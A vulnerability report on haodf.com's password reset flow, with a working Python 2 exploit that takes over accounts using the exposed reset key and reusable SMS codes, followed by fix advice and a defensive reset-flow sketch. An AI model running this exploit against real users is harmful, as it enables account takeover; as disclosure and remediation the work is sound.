1. Reset via mobile number
http://passport.haodf.com/user/resetpassword
Through this URL, a password can be recovered using either an email address or a mobile number.
When we choose to recover by mobile number, the page redirects to the following address, which asks for the username and the SMS verification code:
http://passport.haodf.com/user/sendpasswordsucc?type=mobile&username=xxxxxxx
As can be seen, at this point the username appears directly in the browser address bar, and the verification code can be bypassed.
(BTW, the SMS verification code can be reused over and over; it seems not to expire for a very long time.)
Viewing the page source, we find:
<input name="key" type="hidden" id="key" value="DE4rXvQaMCGXBC3UMxQRXXXXXXXXNCEnO8iGq8jhOf0b" />
This key is the key used to reset the password.
Then construct a POST request to
http://passport.haodf.com/user/confirmpassword
with the data
password=123123&confirmPassword=123123&key=XXXXXX
and that user's password is reset.
2. Reset via username
The site itself does not offer this function, but the intermediate URL above can be entered directly, which allows a reset by username:
http://passport.haodf.com/user/sendpasswordsucc?type=mobile&username=xxxxxxx
3. Reset via email
Similar to the reset via mobile number in section 1.
Attached is a simple EXP written in Python (Python 2, urllib2):
#encoding=utf8
import urllib2

username = 'init'

class MyHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
    # Capture the username that the server exposes in the redirect location
    def http_error_302(self, req, fp, code, msg, httpmsg):
        global username
        for header in httpmsg.headers:
            if header.count('username=') > 0:
                username = header[header.index('username=') + 9 : header.index('\r\n')]
        return urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, httpmsg)

def ResetByPhone(phone):
    resetpwd_url = 'http://passport.haodf.com/user/resetpassword'
    submit_url = 'http://passport.haodf.com/user/confirmpassword'
    # POST the phone number; the response page already carries the reset key
    req = urllib2.Request(resetpwd_url, 'input=%s' % phone)
    opener = urllib2.build_opener(MyHTTPRedirectHandler)
    response = opener.open(req)
    the_page = response.read()
    # Extract the value of <input ... id="key" value="...">
    key = the_page[the_page.index('id="key"') + 16 :]
    key = key[: key.index('"')]
    req = urllib2.Request(submit_url, 'password=%s&confirmPassword=%s&key=%s' % (phone, phone, key))
    response = urllib2.urlopen(req)
    #print response.read()

def ResetByUsername(uname):
    resetpwd_url = 'http://passport.haodf.com/user/sendpasswordsucc'
    submit_url = 'http://passport.haodf.com/user/confirmpassword'
    # Enter the intermediate page directly with only a username
    req = urllib2.Request(resetpwd_url, 'type=mobile&username=%s' % uname)
    response = urllib2.urlopen(req)
    the_page = response.read()
    key = the_page[the_page.index('id="key"') + 16 :]
    key = key[: key.index('"')]
    req = urllib2.Request(submit_url, 'password=%s&confirmPassword=%s&key=%s' % (uname, uname, key))
    response = urllib2.urlopen(req)
    #print response.read()

if __name__ == '__main__':
    ResetByPhone('13912341234')
    ResetByUsername('testuser')
Fix recommendations:
Hide the key.
Add an expiry mechanism for the verification code.
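As an added example (not part of the original report, and not haodf.com's code), the following Python 3 sketch shows a server-side reset flow that applies both recommendations: the reset key is only created after the verification code has been checked on the server, the code expires, is single-use and rate-limited, and the key itself is also short-lived and single-use, so a key never appears in any page before verification. The class name ResetService, the in-memory stores, the TTL values and the simulated SMS outbox are assumptions for illustration.

```python
import hashlib
import hmac
import secrets
import time

OTP_TTL_SECONDS = 300        # assumed: verification code valid for 5 minutes
TOKEN_TTL_SECONDS = 600      # assumed: reset key valid for 10 minutes after verification
MAX_OTP_ATTEMPTS = 5         # assumed: lock the code after this many wrong guesses


class ResetService:
    """Password reset where the key is issued only after the code is verified."""

    def __init__(self, users, clock=time.time):
        self.users = users      # username -> {"phone": ..., "password": ...}
        self.clock = clock      # injectable clock so expiry can be tested offline
        self.otps = {}          # username -> {"hash", "expires", "attempts"}
        self.tokens = {}        # sha256(token) -> {"username", "expires"}
        self.outbox = []        # constructed stand-in for the SMS gateway: (phone, code)

    def request_reset(self, username):
        # Respond identically whether or not the account exists.
        user = self.users.get(username)
        if user is None:
            return
        code = "%06d" % secrets.randbelow(10 ** 6)
        self.otps[username] = {
            "hash": hashlib.sha256(code.encode()).hexdigest(),
            "expires": self.clock() + OTP_TTL_SECONDS,
            "attempts": 0,
        }
        self.outbox.append((user["phone"], code))   # code leaves only via the phone

    def verify_code(self, username, code):
        """Return a fresh reset token on success, None otherwise."""
        entry = self.otps.get(username)
        if entry is None or self.clock() > entry["expires"]:
            self.otps.pop(username, None)            # expired codes are discarded
            return None
        entry["attempts"] += 1
        if entry["attempts"] > MAX_OTP_ATTEMPTS:
            del self.otps[username]                  # too many guesses: code is dead
            return None
        supplied = hashlib.sha256(code.encode()).hexdigest()
        if not hmac.compare_digest(entry["hash"], supplied):
            return None
        del self.otps[username]                      # single use: the code cannot be replayed
        token = secrets.token_urlsafe(32)
        self.tokens[hashlib.sha256(token.encode()).hexdigest()] = {
            "username": username,
            "expires": self.clock() + TOKEN_TTL_SECONDS,
        }
        return token

    def confirm_password(self, token, password, confirm_password):
        """Consume the token and set the new password; False on any failure."""
        if password != confirm_password or len(password) < 8:
            return False
        entry = self.tokens.pop(hashlib.sha256(token.encode()).hexdigest(), None)
        if entry is None or self.clock() > entry["expires"]:
            return False
        self.users[entry["username"]]["password"] = password
        return True
```

The client only ever sees the reset key as the return value of a successful verify_code call, so there is nothing to scrape from the intermediate page, and a reused code, an expired code, a guessed key or a replayed key all fail closed.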